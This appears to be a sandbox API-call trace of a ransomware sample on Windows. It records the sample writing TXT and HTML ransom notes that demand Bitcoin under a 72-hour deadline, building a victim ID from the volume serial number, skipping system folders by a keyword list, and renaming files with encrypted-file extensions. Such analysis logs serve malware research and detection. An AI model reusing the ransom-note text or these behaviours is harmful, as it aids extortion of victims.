	[0201.368] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0201.368] WriteFile (in: hFile=0x32c, lpBuffer=0x186ff8*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x187f1c, lpOverlapped=0x0 | out: lpBuffer=0x186ff8*, lpNumberOfBytesWritten=0x187f1c*=0xc46, lpOverlapped=0x0) returned 1
	[0201.370] CloseHandle (hObject=0x32c) returned 1
	[0201.371] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x186fc8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x186fc8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.371] GetUserNameA (in: lpBuffer=0x186eac, pcbBuffer=0x186fc4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x186fc4) returned 1
	[0201.372] wsprintfW (in: param_1=0x187e48, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0201.372] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0201.373] SetFilePointer (in: hFile=0x32c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0201.373] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0201.373] WriteFile (in: hFile=0x32c, lpBuffer=0x187e48*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x187f24, lpOverlapped=0x0 | out: lpBuffer=0x187e48*, lpNumberOfBytesWritten=0x187f24*=0x30, lpOverlapped=0x0) returned 1
	[0201.373] CloseHandle (hObject=0x32c) returned 1
	[0201.373] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.374] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.374] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0201.374] wsprintfW (in: param_1=0x187c00, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\HELP_DECRYPT_YOUR_FILES.HTML") returned 140
	[0201.374] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0201.375] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0201.375] WriteFile (in: hFile=0x32c, lpBuffer=0x1873f4*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x187f18, lpOverlapped=0x0 | out: lpBuffer=0x1873f4*, lpNumberOfBytesWritten=0x187f18*=0x808, lpOverlapped=0x0) returned 1
	[0201.378] CloseHandle (hObject=0x32c) returned 1
	[0201.378] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.379] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1873dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1873dc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.379] GetUserNameA (in: lpBuffer=0x1872c0, pcbBuffer=0x1873d8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1873d8) returned 1
	[0201.380] wsprintfA (in: param_1=0x187e08, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0201.380] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0201.381] SetFilePointer (in: hFile=0x32c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0201.381] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0201.381] WriteFile (in: hFile=0x32c, lpBuffer=0x187e08*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x187f20, lpOverlapped=0x0 | out: lpBuffer=0x187e08*, lpNumberOfBytesWritten=0x187f20*=0x43, lpOverlapped=0x0) returned 1
	[0201.381] CloseHandle (hObject=0x32c) returned 1
	[0201.381] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*"), lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x918baf4d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x918e0dfc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb8f30
	[0201.382] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*") returned 115
	[0201.382] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.382] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*", cchLength=0x73 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*") returned 0x73
	[0201.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.382] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="windows") returned 0x0
	[0201.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="boot") returned 0x0
	[0201.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="system volume information") returned 0x0
	[0201.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.383] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0201.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="temp") returned 0x0
	[0201.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="program files") returned 0x0
	[0201.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="program files (x86)") returned 0x0
	[0201.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.384] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="appdata") returned 0x0
	[0201.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="application data") returned 0x0
	[0201.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="winnt") returned 0x0
	[0201.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="tmp") returned 0x0
	[0201.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="cache") returned 0x0
	[0201.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="temporary internet files") returned 0x0
	[0201.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="webcache") returned 0x0
	[0201.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="inetcache") returned 0x0
	[0201.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="nvidia") returned 0x0
	[0201.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="packages") returned 0x0
	[0201.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.387] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="cookies") returned 0x0
	[0201.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.387] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="programdata") returned 0x0
	[0201.387] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0201.387] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0201.387] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x918baf4d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x918e0dfc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0201.388] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0201.388] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x915e5cdc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x915e5cdc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9160c28f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13d00, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="2swzeiqw.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="2SWZEI~1.SCL")) returned 1
	[0201.388] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9167e83c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9167e83c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x916a4932, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xb9a0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="60jdjqn9l5w2ukepxx.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="60JDJQ~1.SCL")) returned 1
	[0201.388] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91717166, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91717166, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9173d2de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x152b0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="7upxtvszgekuh-t.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="7UPXTV~1.SCL")) returned 1
	[0201.388] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9178988b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9178988b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9178988b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xaf80, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="9upc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="9UPCSW~1.SCL")) returned 1
	[0201.388] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18f3e1c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0x79f3cb60, ftLastAccessTime.dwHighDateTime=0x1d97426, ftLastWriteTime.dwLowDateTime=0x79f3cb60, ftLastWriteTime.dwHighDateTime=0x1d97426, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="cbrqJym", cAlternateFileName="")) returned 1
	[0201.388] lstrcmpW (lpString1="cbrqJym", lpString2="..") returned 1
	[0201.388] lstrcmpW (lpString1="cbrqJym", lpString2=".") returned 1
	[0201.388] lstrcpyW (in: lpString1=0x18814c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg"
	[0201.388] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0201.388] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="cbrqJym" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym"
	[0201.389] lstrcpyW (in: lpString1=0x187644, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym"
	[0201.389] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\"
	[0201.389] lstrcpyW (in: lpString1=0x187234, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\"
	[0201.389] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*"
	[0201.389] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*"), lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18f3e1c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0x79f3cb60, ftLastAccessTime.dwHighDateTime=0x1d97426, ftLastWriteTime.dwLowDateTime=0x79f3cb60, ftLastWriteTime.dwHighDateTime=0x1d97426, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb9470
